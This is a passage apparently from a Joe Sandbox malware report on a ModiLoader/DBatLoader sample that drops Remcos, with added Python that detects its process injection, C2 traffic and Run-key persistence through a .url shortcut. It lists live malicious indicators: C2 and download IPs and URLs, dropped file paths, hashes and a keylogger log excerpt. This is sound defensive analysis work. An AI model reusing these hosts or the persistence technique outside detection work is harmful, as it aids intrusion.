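ODD_EXEC_EXT = (".pif", ".cmd", ".scr", ".url", ".com")
WEB_PORTS = {80, 443}


@dataclass
class Proc:
    node: int
    image: str
    path: str
    parent: Optional[int]
    drops: list[str] = field(default_factory=list)              # files written
    conns: list[tuple[str, int]] = field(default_factory=list)  # (remote ip, port)


TREE: list[Proc] = [
    Proc(8, "SEPTobn3BR.exe", "C:\\Users\\user\\Desktop\\SEPTobn3BR.exe", None,  # path ASSUMED
         drops=["C:\\Users\\Public\\Libraries\\Emxwenem.PIF",
                "C:\\Users\\Public\\Libraries\\FX.cmd",
                "C:\\Users\\Public\\Libraries\\Emxwenem",
                "C:\\Users\\Public\\Emxwenem.url"],
         conns=[("103.82.231.117", 443)]),
    Proc(13, "Emxwenem.PIF", "C:\\Users\\Public\\Libraries\\Emxwenem.PIF", None),
    Proc(15, "Emxwenem.PIF", "C:\\Users\\Public\\Libraries\\Emxwenem.PIF", None),
    Proc(17, "colorcpl.exe", "C:\\Windows\\System32\\colorcpl.exe", 8,  # path ASSUMED
         drops=["C:\\ProgramData\\remcos\\logs.dat"],
         conns=[("185.174.103.111", 2404), ("178.237.33.50", 80)]),
    Proc(22, "cmd.exe", "C:\\Windows\\System32\\cmd.exe", 8),            # path ASSUMED
    Proc(24, "colorcpl.exe", "C:\\Windows\\System32\\colorcpl.exe", 13),
    Proc(26, "cmd.exe", "C:\\Windows\\System32\\cmd.exe", 13),
    Proc(28, "colorcpl.exe", "C:\\Windows\\System32\\colorcpl.exe", 15),
    Proc(30, "cmd.exe", "C:\\Windows\\System32\\cmd.exe", 15),
    Proc(32, "conhost.exe", "C:\\Windows\\System32\\conhost.exe", 22),
    Proc(34, "conhost.exe", "C:\\Windows\\System32\\conhost.exe", 26),
    Proc(36, "conhost.exe", "C:\\Windows\\System32\\conhost.exe", 30),
]


def _in_public(path: str) -> bool:
    return path.lower().startswith(PUBLIC_DIRS)


def _odd_extension(path: str) -> bool:
    return path.lower().endswith(ODD_EXEC_EXT)


def _is_system_binary(p: Proc) -> bool:
    return p.path.lower().startswith("c:\\windows\\")


def suspicious_parents(tree: list[Proc]) -> set[int]:
    """Nodes that execute from a public folder, carry a non-.exe executable
    extension, or plant such a file in a public folder (the loader stage)."""
    flagged: set[int] = set()
    for p in tree:
        if _in_public(p.path) or _odd_extension(p.path):
            flagged.add(p.node)
        elif any(_in_public(d) and _odd_extension(d) for d in p.drops):
            flagged.add(p.node)
    return flagged


def lolbin_children(tree: list[Proc]) -> set[int]:
    """Windows system binaries started by a suspicious parent. Combined with
    the parent's 'early bird' injection signature, these are the processes
    whose memory actually runs the injected payload."""
    bad = suspicious_parents(tree)
    return {p.node for p in tree if _is_system_binary(p) and p.parent in bad}


def beacon_hosts(tree: list[Proc]) -> set[int]:
    """Those system binaries that make any outbound connection at all."""
    hosts = lolbin_children(tree)
    return {p.node for p in tree if p.node in hosts and p.conns}


def c2_candidates(tree: list[Proc]) -> list[tuple[int, str, int]]:
    """Connections from a hollowed system binary to a non-web port; the
    port-80 geoplugin.net lookup is left to beacon_hosts."""
    hosts = lolbin_children(tree)
    return [(p.node, ip, port) for p in tree if p.node in hosts
            for ip, port in p.conns if port not in WEB_PORTS]


if __name__ == "__main__":
    print("suspicious parents:", sorted(suspicious_parents(TREE)))
    print("system binaries under them:", sorted(lolbin_children(TREE)))
    print("network-active:", sorted(beacon_hosts(TREE)))
    print("C2 candidates:", c2_candidates(TREE))
```

The same three checks map directly onto the Sigma titles listed at the top of the report (Execution from Suspicious Folder, Parent in Public Folder Suspicious Process): the loader is caught by its location and extension, the injected host by its parent, and the C2 channel by the port.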

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


Source | Detection | Scanner | Label
SEPTobn3BR.exe | 67% | Virustotal | -
SEPTobn3BR.exe | 55% | ReversingLabs | Win32.Trojan.ModiLoader
SEPTobn3BR.exe | 100% | Avira | HEUR/AGEN.1326052
SEPTobn3BR.exe | 100% | Joe Sandbox ML | -

Source | Detection | Scanner | Label
C:\Users\Public\Libraries\Emxwenem.PIF | 100% | Avira | HEUR/AGEN.1326052
C:\Users\Public\Libraries\Emxwenem.PIF | 100% | Joe Sandbox ML | -
C:\Users\Public\Libraries\Emxwenem.PIF | 55% | ReversingLabs | Win32.Trojan.ModiLoader
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label
http://www.pmail.com0 | 0% | Avira URL Cloud | safe
https://www.maan2u.com/docs/233_Emxwenem | 0% | Avira URL Cloud | safe
https://www.maan2u.com/docs/233_Emxwenemixg8 | 0% | Avira URL Cloud | safe
https://www.maan2u.com/docs/233_Emxwenemixg | 0% | Avira URL Cloud | safe
https://www.maan2u.com:443/docs/233_Emxwenemixg | 0% | Avira URL Cloud | safe
apostlejob2.duckdns.org | 0% | Avira URL Cloud | safe
https://www.maan2u.com/docs/233_Emxwenemixg5 | 0% | Avira URL Cloud | safe
https://www.maan2u.com/ | 0% | Avira URL Cloud | safe

Note: the trailing characters on several of these URLs (the "0" after pmail.com, the "8" and "5" after Emxwenemixg) are bytes that followed the string in memory, not part of the URL. The Avira URL Cloud "safe" verdicts are reputation lookups only; the same hosts are marked malicious in the domain and URL tables below, because the sample fetched its second stage from maan2u.com during the analysis and apostlejob2.duckdns.org is flagged as malicious there as well.
Name | IP | Active | Malicious | Antivirus Detection | Reputation
geoplugin.net | 178.237.33.50 | true | false | - | high
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | - | high
maan2u.com | 103.82.231.117 | true | true | - | unknown
www.maan2u.com | unknown | unknown | true | - | unknown
Name | Malicious | Antivirus Detection | Reputation
http://geoplugin.net/json.gp | false | - | high
https://www.maan2u.com/docs/233_Emxwenemixg | true | Avira URL Cloud: safe | unknown
apostlejob2.duckdns.org | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation

Memory dump set A (shared by the seven Sectigo certificate-chain URLs below): SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmp

http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0 | set A | false | - | high
https://sectigo.com/CPS0 | set A | false | - | high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | set A | false | - | high
http://ocsp.sectigo.com0 | set A | false | - | high
http://geoplugin.net/json.gp/C | SEPTobn3BR.exe, 00000000.00000002.1449264347.000000007E8E0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 0000000A.00000002.1526920917.0000000002990000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000002.1606949388.0000000002C00000.00000040.00000400.00020000.00000000.sdmp | false | - | high
http://geoplugin.net/json.gpl | colorcpl.exe, 00000005.00000002.3812685840.00000000311F5000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.2755366865.00000000311F5000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.1465318188.00000000311F0000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | set A | false | - | high
https://www.maan2u.com/docs/233_Emxwenem | SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020ACD000.00000004.00001000.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp4 | colorcpl.exe, 00000005.00000003.1465318188.00000000311F0000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | set A | false | - | high
https://www.maan2u.com/docs/233_Emxwenemixg5 | SEPTobn3BR.exe, 00000000.00000002.1420164294.000000000060A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.maan2u.com:443/docs/233_Emxwenemixg | SEPTobn3BR.exe, 00000000.00000002.1420164294.0000000000633000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.maan2u.com/docs/233_Emxwenemixg8 | SEPTobn3BR.exe, 00000000.00000002.1420164294.0000000000633000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gpSystem32 | colorcpl.exe, 00000005.00000002.3812571420.00000000311CA000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://ocsp.sectigo.com0C | set A | false | - | high
https://www.maan2u.com/ | SEPTobn3BR.exe, 00000000.00000002.1420164294.0000000000628000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp= | colorcpl.exe, 00000005.00000003.2755366865.00000000311F5000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.1465318188.00000000311F0000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.pmail.com0 | SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A5A000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000002.1626895029.0000000020B19000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.174.103.111 | unknown | Ukraine | 8100 | ASN-QUADRANET-GLOBAL, US | true
103.82.231.117 | maan2u.com | Malaysia | 55720 | GIGABIT-MY Gigabit Hosting Sdn Bhd, MY | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-AS ATOM86, NL | false
                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1578037
                                                  Start date and time:2024-12-19 07:59:15 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 10m 31s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                   Number of new started processes analysed:19
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:SEPTobn3BR.exe
                                                  renamed because original name is a hash value
                                                  Original Sample Name:ccdcd04a0ffde31366754018598eb02f.exe
                                                  Detection:MAL
                                                  Classification:mal100.rans.troj.spyw.evad.winEXE@21/8@2/3
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HCA Information:
                                                  • Successful, ratio: 99%
                                                  • Number of executed functions: 75
                                                  • Number of non-executed functions: 220
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe
                                                  • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53
                                                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                   • Not all processes were analyzed, report is missing behavior information
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:00:19 | API Interceptor | 2x Sleep call for process: SEPTobn3BR.exe modified
02:00:38 | API Interceptor | 4x Sleep call for process: Emxwenem.PIF modified
02:01:02 | API Interceptor | 6263009x Sleep call for process: colorcpl.exe modified
08:00:29 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Emxwenem C:\Users\Public\Emxwenem.url
08:00:37 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Emxwenem C:\Users\Public\Emxwenem.url
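The two Autostart entries are this sample's persistence: a Run value named Emxwenem that points at C:\Users\Public\Emxwenem.url, written to both the 32-bit and 64-bit registry views (HKCU and HKCU64 in the report's notation). A .url file is an Internet Shortcut, and its URL= field may name a local file, so a Run value of that kind has to be followed one hop further before the real autostart target is known. The script below is an added example, not code from the Joe Sandbox report: it parses timeline lines of this shape, flags Run values that live in a public folder or are shortcuts rather than executables, and for a .url target reads the shortcut and resolves its URL= field to a Windows path. The shortcut contents, the benign OneDrive entry and the path-to-contents mapping are constructed for the example; the report does not show what Emxwenem.url points at.

```python
"""Triage of Run-key autostart entries of the kind the timeline records.

Added example, not code from the Joe Sandbox report. The two Emxwenem lines
are copied from the timeline; the OneDrive line and the .url contents are
CONSTRUCTED (the report does not show the shortcut's target).
"""
from __future__ import annotations

import configparser
import re
from urllib.parse import unquote, urlparse

PUBLIC_DIRS = ("c:\\users\\public\\", "c:\\programdata\\")
ODD_EXEC_EXT = (".pif", ".cmd", ".scr", ".com", ".bat", ".vbs", ".js")

# "<time> Autostart Run: <key> <value name> <target ...>"
AUTOSTART_RE = re.compile(
    r"^(?P<time>\d\d:\d\d:\d\d)\s+Autostart\s+Run:\s*"
    r"(?P<key>\S+)\s+(?P<name>\S+)\s+(?P<target>.+)$"
)

TIMELINE = [
    "08:00:29 Autostart Run: HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
    " Emxwenem C:\\Users\\Public\\Emxwenem.url",
    "08:00:37 Autostart Run: HKCU64\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
    " Emxwenem C:\\Users\\Public\\Emxwenem.url",
    # CONSTRUCTED benign entry, included as a control
    "08:01:00 Autostart Run: HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
    " OneDrive \"C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background",
]

# CONSTRUCTED stand-in for the dropped shortcut, keyed by lower-cased path.
URL_FILES = {
    "c:\\users\\public\\emxwenem.url":
        "[InternetShortcut]\nURL=file:///C:/Users/Public/Libraries/Emxwenem.PIF\n",
}


def parse_autostart(line: str) -> dict | None:
    m = AUTOSTART_RE.match(line)
    return m.groupdict() if m else None


def split_command(target: str) -> str:
    """Executable part of a Run value: the quoted path, or the first token."""
    target = target.strip()
    if target.startswith('"'):
        end = target.find('"', 1)
        return target[1:end] if end > 0 else target[1:]
    return target.split(" ", 1)[0]


def resolve_url_shortcut(path: str, url_files: dict) -> str | None:
    """Read a .url Internet Shortcut and return its target; a file:// URL is
    turned back into a Windows path so the usual path checks apply."""
    content = url_files.get(path.lower())
    if content is None:
        return None
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.read_string(content)
    url = cfg.get("InternetShortcut", "URL", fallback=None)
    if not url:
        return None
    u = urlparse(url)
    if u.scheme.lower() != "file":
        return url                        # remote target: report verbatim
    p = unquote(u.path)
    if re.match(r"^/[A-Za-z]:", p):       # "/C:/..." -> "C:/..."
        p = p[1:]
    return p.replace("/", "\\")


def assess(entry: dict, url_files: dict) -> dict:
    exe = split_command(entry["target"])
    low = exe.lower()
    reasons, resolved = [], None
    if low.startswith(PUBLIC_DIRS):
        reasons.append("target lives in a user-writable public folder")
    if low.endswith(".url"):
        reasons.append("Run value is an Internet Shortcut, not an executable")
        resolved = resolve_url_shortcut(exe, url_files)
        if resolved and (resolved.lower().startswith(PUBLIC_DIRS)
                         or resolved.lower().endswith(ODD_EXEC_EXT)):
            reasons.append("shortcut resolves to " + resolved)
    elif low.endswith(ODD_EXEC_EXT):
        reasons.append("target has a script or legacy executable extension")
    return {**entry, "exe": exe, "resolved": resolved, "reasons": reasons}


def triage(lines, url_files=URL_FILES) -> list[dict]:
    """Parse every Autostart line and keep only entries with findings."""
    out = []
    for line in lines:
        entry = parse_autostart(line)
        if entry is not None:
            verdict = assess(entry, url_files)
            if verdict["reasons"]:
                out.append(verdict)
    return out


if __name__ == "__main__":
    for v in triage(TIMELINE):
        print(v["key"], v["name"], "->", v["resolved"] or v["exe"], v["reasons"])
```

On a live host the url_files mapping is replaced by reading the shortcut from disk and the timeline lines by a registry or Autoruns export; the checks themselves stay the same, and the HKCU/HKCU64 pair is worth keeping as a separate signal, since a value written identically to both views is typical of a loader that persists without caring which view the shell reads.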
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.174.103.111 | greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.hta | malicious | Cobalt Strike, Remcos, DBatLoader | -
103.82.231.117 | greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.hta | malicious | Cobalt Strike, Remcos, DBatLoader | -
103.82.231.117 | 1DDHIzYyor.exe | malicious | DBatLoader | -
103.82.231.117 | creatednew.hta | malicious | Cobalt Strike, DBatLoader, HTMLPhisher | -
178.237.33.50 | greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.hta | malicious | Cobalt Strike, Remcos, DBatLoader | geoplugin.net/json.gp
178.237.33.50 | RFQ NO 65-58003.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | SwiftCopy_PaymtRecpt121228.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | BBVA S.A..vbs | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | givenbestupdatedoingformebestthingswithgreatnewsformegive.hta | malicious | Cobalt Strike, Remcos | geoplugin.net/json.gp
178.237.33.50 | clearentirethingwithbestnoticetheeverythinggooodfrome.hta | malicious | Cobalt Strike, Remcos | geoplugin.net/json.gp
178.237.33.50 | 7Sbq4gMMlp.exe | malicious | Remcos | geoplugin.net/json.gp
Match | Associated Sample Name / URL | Detection | Threat Name | Context
maan2u.com | K0hpP6V2fo.rtf | malicious | DBatLoader, Remcos | 112.137.173.77
maan2u.com | XjPA2pnUhC.exe | malicious | Remcos, DBatLoader | 112.137.173.77
maan2u.com | Payment Slip.xls | malicious | DBatLoader, Remcos | 112.137.173.77
maan2u.com | EORJy4JxW2.rtf | malicious | DBatLoader, Remcos | 112.137.173.77
maan2u.com | ZPujMIT7Vs.exe | malicious | Remcos, DBatLoader | 112.137.173.77
s-part-0035.t-0009.t-msedge.net | Brooming.vbs | malicious | Remcos, GuLoader | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | Gosjeufon.cpl.exe | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbs | malicious | SmokeLoader | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | doc55334.html | malicious | HTMLPhisher | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | 3DI3mOIlxE.exe | malicious | LummaC, Stealc | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | s4PymYGgSh.lnk | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | http://mee6.xyz | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | http://johnlewisfinance.qa.uinsure.co.uk | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | Configurator.exe | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | https://shorturl.at/roHta | malicious | HTMLPhisher | 13.107.246.63
geoplugin.net | greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.hta | malicious | Cobalt Strike, Remcos, DBatLoader | 178.237.33.50
geoplugin.net | RFQ NO 65-58003.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | SwiftCopy_PaymtRecpt121228.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | BBVA S.A..vbs | malicious | Remcos | 178.237.33.50
geoplugin.net | Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | givenbestupdatedoingformebestthingswithgreatnewsformegive.hta | malicious | Cobalt Strike, Remcos | 178.237.33.50
geoplugin.net | clearentirethingwithbestnoticetheeverythinggooodfrome.hta | malicious | Cobalt Strike, Remcos | 178.237.33.50
geoplugin.net | 7Sbq4gMMlp.exe | malicious | Remcos | 178.237.33.50
                                                          Match (group) | Associated Sample Name / URL | Detection | Threat Name | Context
                                                          Match: GIGABIT-MYGigabitHostingSdnBhdMY
                                                          x86_64.nn.elf | malicious | Mirai, Okiru
                                                          • 103.106.249.9
                                                          greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.hta | malicious | Cobalt Strike, Remcos, DBatLoader
                                                          • 103.82.231.117
                                                          1DDHIzYyor.exe | malicious | DBatLoader
                                                          • 103.82.231.117
                                                          creatednew.hta | malicious | Cobalt Strike, DBatLoader, HTMLPhisher
                                                          • 103.82.231.117
                                                          x86.elf | malicious | Mirai
                                                          • 103.244.24.127
                                                          la.bot.sparc.elf | malicious | Unknown
                                                          • 103.21.90.22
                                                          dontopenme.html | malicious | Unknown
                                                          • 185.93.164.24
                                                          x86_32.elf | malicious | Mirai, Gafgyt
                                                          • 103.85.108.43
                                                          FPPhfkcDCh.exe | malicious | Remcos
                                                          • 103.144.139.157
                                                          botnet.mips.elf | malicious | Mirai, Moobot
                                                          • 103.229.240.20
                                                          Match: ASN-QUADRANET-GLOBALUS
                                                          la.bot.sh4.elf | malicious | Mirai
                                                          • 103.68.202.250
                                                          greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.hta | malicious | Cobalt Strike, Remcos, DBatLoader
                                                          • 185.174.103.111
                                                          Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe | malicious | Remcos, GuLoader
                                                          • 66.63.187.30
                                                          Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe | malicious | Remcos, GuLoader
                                                          • 66.63.187.30
                                                          Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe | malicious | Remcos, GuLoader
                                                          • 66.63.187.30
                                                          armv4l.elf | malicious | Mirai
                                                          • 204.44.218.122
                                                          rebirth.arm7.elf | malicious | Mirai, Okiru
                                                          • 104.223.28.126
                                                          jew.arm.elf | malicious | Unknown
                                                          • 72.11.146.73
                                                          2.elf | malicious | Unknown
                                                          • 173.205.82.95
                                                          Josho.arm7.elf | malicious | Mirai
                                                          • 185.228.81.1
                                                          Match: ATOM86-ASATOM86NL
                                                          greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.hta | malicious | Cobalt Strike, Remcos, DBatLoader
                                                          • 178.237.33.50
                                                          RFQ NO 65-58003.exe | malicious | Remcos
                                                          • 178.237.33.50
                                                          SwiftCopy_PaymtRecpt121228.exe | malicious | Remcos
                                                          • 178.237.33.50
                                                          BBVA S.A..vbs | malicious | Remcos
                                                          • 178.237.33.50
                                                          Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe | malicious | Remcos, GuLoader
                                                          • 178.237.33.50
                                                          Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe | malicious | Remcos, GuLoader
                                                          • 178.237.33.50
                                                          Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe | malicious | Remcos, GuLoader
                                                          • 178.237.33.50
                                                          givenbestupdatedoingformebestthingswithgreatnewsformegive.hta | malicious | Cobalt Strike, Remcos
                                                          • 178.237.33.50
                                                          clearentirethingwithbestnoticetheeverythinggooodfrome.hta | malicious | Cobalt Strike, Remcos
                                                          • 178.237.33.50
                                                          7Sbq4gMMlp.exe | malicious | Remcos
                                                          • 178.237.33.50
                                                          Match (group) | Associated Sample Name / URL | Detection | Threat Name | Context
                                                          Match: a0e9f5d64349fb13191bc781f81f42e1
                                                          Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe | malicious | DBatLoader, FormBook
                                                          • 103.82.231.117
                                                          AWrVzd6XpC.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar
                                                          • 103.82.231.117
                                                          469oyXQbRY.exe | malicious | LummaC
                                                          • 103.82.231.117
                                                          file.exe | malicious | Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS
                                                          • 103.82.231.117
                                                          file.exe | malicious | LummaC, Amadey, LummaC Stealer, RHADAMANTHYS, Xmrig
                                                          • 103.82.231.117
                                                          file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, Stealc
                                                          • 103.82.231.117
                                                          https://d2kjcgrb1q4xt7.cloudfront.net/mULiCoBDj2Ug.exe | malicious | Unknown
                                                          • 103.82.231.117
                                                          file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Xmrig
                                                          • 103.82.231.117
                                                          file.exe | malicious | LummaC, Amadey, LummaC Stealer, Xmrig
                                                          • 103.82.231.117
                                                          rK0CtrtVrl.exe | malicious | LummaC, Stealc
                                                          • 103.82.231.117
                                                          Match (group) | Associated Sample Name / URL | Detection | Threat Name | Context
                                                          Match: C:\Users\Public\Libraries\Emxwenem.PIF
                                                          greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.hta | malicious | Cobalt Strike, Remcos, DBatLoader
                                                            Process:C:\Windows\SysWOW64\colorcpl.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):288
                                                            Entropy (8bit):3.309628276089514
                                                            Encrypted:false
                                                            SSDEEP:6:6lZHlH85YcIeeDAlOWAAe5q1gWAAe5q1gWAv:6lJFsec0WFe5BWFe5BW+
                                                            MD5:7FE85014D39BEA4C5929540363CECF45
                                                            SHA1:9B038CEBAA11D8FB1C06ECF02EFEFB65BB2074E7
                                                            SHA-256:489D5151E913438BB3A446DEF3309A643845257C77F7B2B9A73A93D39E818822
                                                            SHA-512:6A43DAFBCECC3B261F9BC6ED789C42F283BBA43A5A6B8964F6DF3397323EF689815472FE0219D285645076FB3461A68F49C5632ACC939D9A2A543D83EC64528A
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                            Preview:....[.2.0.2.4./.1.2./.1.9. .0.2.:.0.0.:.2.8. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                            Process:C:\Users\user\Desktop\SEPTobn3BR.exe
                                                            File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Emxwenem.PIF">), ASCII text, with CRLF line terminators
                                                            Category:dropped
